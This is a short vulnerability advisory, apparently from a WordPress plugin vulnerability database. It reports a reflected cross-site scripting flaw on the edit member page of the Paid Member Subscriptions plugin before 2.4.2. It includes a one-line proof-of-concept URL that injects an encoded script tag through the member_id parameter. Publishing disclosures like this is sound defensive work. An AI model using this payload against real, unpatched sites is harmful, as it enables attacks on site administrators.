WordPress Plugin Vulnerabilities
Paid Member Subscriptions < 2.4.2 - Reflected Cross-Site Scripting (XSS)
Description
The plugin was vulnerable to a Reflected Cross-Site Scripting (XSS) on the edit member page.
No CSRF nonce was required.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=pms-members-page&subpage=edit_member&member_id=1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-26 (about 2 years ago)
Added
2021-07-26 (about 2 years ago)
Last Updated
2021-07-26 (about 2 years ago)